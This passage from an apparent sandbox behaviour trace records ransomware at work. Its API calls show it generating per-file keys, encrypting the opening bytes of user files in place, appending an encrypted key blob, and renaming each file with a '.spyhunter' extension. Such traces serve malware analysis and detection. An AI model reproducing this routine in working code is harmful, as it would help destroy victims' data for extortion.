dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36d10 | out: hHeap=0x2c0000) returned 1 [0142.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f058 | out: pbBuffer=0x57f058) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f050*=0x30) returned 1 [0142.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\." (normalized: "c:\\users\\public\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36c88 | out: hHeap=0x2c0000) returned 1 [0142.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f058 | out: pbBuffer=0x57f058) returned 1 [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f050*=0x30) returned 1 [0142.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f050 | out: pbBuffer=0x57f050) returned 1 [0142.386] GetProcessHeap () returned 0x2c0000 [0142.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57f048*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57f048*=0x30) returned 1 [0142.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\." (normalized: "c:\\users\\public\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.387] GetProcessHeap () returned 0x2c0000 [0142.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.387] GetProcessHeap () returned 0x2c0000 [0142.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0142.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f050 | out: pbBuffer=0x57f050) returned 1 [0142.387] GetProcessHeap () returned 0x2c0000 [0142.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0142.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f048*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f048*=0x30) returned 1 [0142.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.387] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0142.387] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.387] GetProcessHeap () returned 0x2c0000 [0142.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.388] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f00c*=0xae, lpOverlapped=0x0) returned 1 [0142.388] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.388] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x57f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f00c*=0xae, lpOverlapped=0x0) returned 1 [0142.389] GetProcessHeap () returned 0x2c0000 [0142.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.389] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.389] WriteFile (in: hFile=0x120, lpBuffer=0x57f04c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f00c, lpOverlapped=0x0 | out: lpBuffer=0x57f04c*, lpNumberOfBytesWritten=0x57f00c*=0x4, lpOverlapped=0x0) returned 1 [0142.389] WriteFile (in: hFile=0x120, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f00c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f00c*=0x30, lpOverlapped=0x0) returned 1 [0142.389] CloseHandle (hObject=0x120) returned 1 [0142.389] GetProcessHeap () returned 0x2c0000 [0142.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.389] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini.spyhunter") returned 34 [0142.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\desktop.ini.spyhunter" (normalized: "c:\\users\\desktop.ini.spyhunter")) returned 1 [0142.390] GetProcessHeap () returned 0x2c0000 [0142.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.390] GetProcessHeap () returned 0x2c0000 [0142.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0142.390] GetProcessHeap () returned 0x2c0000 [0142.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d1830 | out: hHeap=0x2c0000) returned 1 [0142.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f040 | out: pbBuffer=0x57f040) returned 1 [0142.392] GetProcessHeap () returned 0x2c0000 [0142.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0142.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f038*=0x30) returned 1 [0142.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0142.392] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.392] GetProcessHeap () returned 0x2c0000 [0142.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.393] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57effc*=0x1f8, lpOverlapped=0x0) returned 1 [0142.393] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.393] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57effc*=0x1f8, lpOverlapped=0x0) returned 1 [0142.393] GetProcessHeap () returned 0x2c0000 [0142.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.394] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.394] WriteFile (in: hFile=0x120, lpBuffer=0x57f03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x57f03c*, lpNumberOfBytesWritten=0x57effc*=0x4, lpOverlapped=0x0) returned 1 [0142.394] WriteFile (in: hFile=0x120, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57effc*=0x30, lpOverlapped=0x0) returned 1 [0142.421] CloseHandle (hObject=0x120) returned 1 [0142.421] GetProcessHeap () returned 0x2c0000 [0142.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.421] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.spyhunter") returned 49 [0142.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\videos\\desktop.ini.spyhunter")) returned 1 [0142.421] GetProcessHeap () returned 0x2c0000 [0142.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.421] GetProcessHeap () returned 0x2c0000 [0142.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0142.421] GetProcessHeap () returned 0x2c0000 [0142.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330150 | out: hHeap=0x2c0000) returned 1 [0142.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f040 | out: pbBuffer=0x57f040) returned 1 [0142.422] GetProcessHeap () returned 0x2c0000 [0142.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0142.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f038*=0x30) returned 1 [0142.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.422] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0142.422] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.422] GetProcessHeap () returned 0x2c0000 [0142.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.422] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57effc*=0x17c, lpOverlapped=0x0) returned 1 [0142.440] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.440] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57effc*=0x17c, lpOverlapped=0x0) returned 1 [0142.441] GetProcessHeap () returned 0x2c0000 [0142.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.441] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.441] WriteFile (in: hFile=0x120, lpBuffer=0x57f03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x57f03c*, lpNumberOfBytesWritten=0x57effc*=0x4, lpOverlapped=0x0) returned 1 [0142.441] WriteFile (in: hFile=0x120, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57effc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57effc*=0x30, lpOverlapped=0x0) returned 1 [0142.441] CloseHandle (hObject=0x120) returned 1 [0142.441] GetProcessHeap () returned 0x2c0000 [0142.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.441] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.spyhunter") returned 50 [0142.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\pictures\\desktop.ini.spyhunter")) returned 1 [0142.442] GetProcessHeap () returned 0x2c0000 [0142.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.442] GetProcessHeap () returned 0x2c0000 [0142.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0142.442] GetProcessHeap () returned 0x2c0000 [0142.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b3a8 | out: hHeap=0x2c0000) returned 1 [0142.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f038 | out: pbBuffer=0x57f038) returned 1 [0142.442] GetProcessHeap () returned 0x2c0000 [0142.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0142.442] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f030*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f030*=0x30) returned 1 [0142.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.443] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0142.443] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".txt") returned 0x0 [0142.443] GetProcessHeap () returned 0x2c0000 [0142.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.443] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eff4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eff4*=0x2800, lpOverlapped=0x0) returned 1 [0142.456] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.456] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eff4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eff4*=0x2800, lpOverlapped=0x0) returned 1 [0142.456] GetProcessHeap () returned 0x2c0000 [0142.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.456] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.457] WriteFile (in: hFile=0x120, lpBuffer=0x57f034*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eff4, lpOverlapped=0x0 | out: lpBuffer=0x57f034*, lpNumberOfBytesWritten=0x57eff4*=0x4, lpOverlapped=0x0) returned 1 [0142.458] WriteFile (in: hFile=0x120, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eff4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57eff4*=0x30, lpOverlapped=0x0) returned 1 [0142.458] CloseHandle (hObject=0x120) returned 1 [0142.458] GetProcessHeap () returned 0x2c0000 [0142.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.458] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.spyhunter") returned 78 [0142.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.spyhunter" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.spyhunter")) returned 1 [0142.466] GetProcessHeap () returned 0x2c0000 [0142.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.466] GetProcessHeap () returned 0x2c0000 [0142.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0142.466] GetProcessHeap () returned 0x2c0000 [0142.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefb98 | out: hHeap=0x2c0000) returned 1 [0142.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f020 | out: pbBuffer=0x57f020) returned 1 [0142.471] GetProcessHeap () returned 0x2c0000 [0142.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f018*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f018*=0x30) returned 1 [0142.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0142.471] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".txt") returned 0x0 [0142.471] GetProcessHeap () returned 0x2c0000 [0142.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.471] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57efdc*=0x2800, lpOverlapped=0x0) returned 1 [0142.484] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.484] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57efdc*=0x2800, lpOverlapped=0x0) returned 1 [0142.484] GetProcessHeap () returned 0x2c0000 [0142.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.484] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.484] WriteFile (in: hFile=0x120, lpBuffer=0x57f01c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x57f01c*, lpNumberOfBytesWritten=0x57efdc*=0x4, lpOverlapped=0x0) returned 1 [0142.525] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efdc*=0x30, lpOverlapped=0x0) returned 1 [0142.525] CloseHandle (hObject=0x120) returned 1 [0142.735] GetProcessHeap () returned 0x2c0000 [0142.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.735] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.spyhunter") returned 63 [0142.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.spyhunter" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.spyhunter")) returned 1 [0142.736] GetProcessHeap () returned 0x2c0000 [0142.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.736] GetProcessHeap () returned 0x2c0000 [0142.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.736] GetProcessHeap () returned 0x2c0000 [0142.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc810 | out: hHeap=0x2c0000) returned 1 [0142.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f020 | out: pbBuffer=0x57f020) returned 1 [0142.736] GetProcessHeap () returned 0x2c0000 [0142.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f018*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f018*=0x30) returned 1 [0142.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.736] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0142.736] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".txt") returned 0x0 [0142.737] GetProcessHeap () returned 0x2c0000 [0142.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0142.737] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57efdc*=0x2800, lpOverlapped=0x0) returned 1 [0142.982] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.982] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57efdc*=0x2800, lpOverlapped=0x0) returned 1 [0142.982] GetProcessHeap () returned 0x2c0000 [0142.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0142.982] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.982] WriteFile (in: hFile=0x178, lpBuffer=0x57f01c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x57f01c*, lpNumberOfBytesWritten=0x57efdc*=0x4, lpOverlapped=0x0) returned 1 [0142.991] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efdc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efdc*=0x30, lpOverlapped=0x0) returned 1 [0142.991] CloseHandle (hObject=0x178) returned 1 [0142.991] GetProcessHeap () returned 0x2c0000 [0142.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.991] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.spyhunter") returned 69 [0142.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.spyhunter" (normalized: 